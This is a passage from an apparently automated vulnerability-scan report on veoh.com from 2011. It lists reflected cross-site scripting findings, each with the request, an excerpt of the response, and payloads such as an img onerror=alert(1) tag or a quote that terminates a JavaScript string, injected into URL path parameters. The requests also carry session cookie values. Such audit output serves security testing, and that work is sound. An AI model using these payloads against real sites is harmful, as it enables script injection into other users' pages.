<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurea9c05<img src=a onerror=alert(1)>ebb993b4b67"}</textarea>
...[SNIP]...

1.436. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1adb'%3b90455422d30 was submitted in the REST URL parameter 6. This input was echoed as a1adb';90455422d30 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmSa1adb'%3b90455422d30 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=42
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'78598efc6e65465524451afb8963c2f3',
'v20757961gnh48zmSa1adb';90455422d30'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.437. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735 was submitted in the REST URL parameter 4. This input was echoed as 81165"><img src=a onerror=alert(1)>17f00c2e735 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=68
Content-Length: 74599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure81165"><img src=a onerror=alert(1)>17f00c2e735/sort/most viewed" selected="selected">
...[SNIP]...

1.438. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9 was submitted in the REST URL parameter 4. This input was echoed as 1f894<img src=a onerror=alert(1)>9de463e3ec9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=70
Content-Length: 74555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure1f894<img src=a onerror=alert(1)>9de463e3ec9"}</textarea>
...[SNIP]...

1.439. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d86c9'%3b11294ec602e was submitted in the REST URL parameter 6. This input was echoed as d86c9';11294ec602e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQzd86c9'%3b11294ec602e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:52 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=60
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'c0d9e3d7f1023f54ebaf4a7452132be1',
'v20758438BTte3QQzd86c9';11294ec602e'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.440. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 218d8'%3b167cb8b726a was submitted in the REST URL parameter 6. This input was echoed as 218d8';167cb8b726a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr218d8'%3b167cb8b726a HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 94329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'6517df68b38a6e9c69de74651b741324',
'v20759029Mf8YXNhr218d8';167cb8b726a'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.441. http://www.veoh.com/browse/videos/category/action_adventure4957f [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a was submitted in the REST URL parameter 4. This input was echoed as 1b947"><img src=a onerror=alert(1)>1a22388a0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:34:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=75
Content-Length: 57867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure4957f1b947"><img src=a onerror=alert(1)>1a22388a0a/sort/most viewed" selected="selected">
...[SNIP]...

1.442. http://www.veoh.com/browse/videos/category/action_adventure4957f [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 was submitted in the REST URL parameter 4. This input was echoed as 265a6<img src=a onerror=alert(1)>59b74d09c35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 57833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure4957f265a6<img src=a onerror=alert(1)>59b74d09c35"}</textarea>
...[SNIP]...

1.443. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

Issue detail

The value of REST URL parameter 4 is copied into the name of an HTML tag attribute. The payload f915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7 was submitted in the REST URL parameter 4. This input was echoed as f915b><img src=a onerror=alert(1)>991aab001b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f"><img%20srcf915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=40
Content-Length: 76933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<img srcf915b><img src=a onerror=alert(1)>991aab001b7=a onerror=alert(1)>
...[SNIP]...

1.444. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35 was submitted in the REST URL parameter 4. This input was echoed as ddc51<img src=a onerror=alert(1)>095a10c6f35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:14 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 76573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_ddc51<img src=a onerror=alert(1)>095a10c6f35=a onerror=alert(1)>
...[SNIP]...

1.445. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee was submitted in the REST URL parameter 4. This input was echoed as 94381<img src=a onerror=alert(1)>52a0288ccee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d81594381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee/watch/v18978294NGnK88j8/a HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 77063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<img src=a onerror=alert(1)>b411440d81594381<img src=a onerror=alert(1)>52a0288ccee/sort/most viewed" selected="selected">
...[SNIP]...

1.446. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a was submitted in the REST URL parameter 4. This input was echoed as ba538"><img src=a onerror=alert(1)>0ced7d2746a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/animationba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
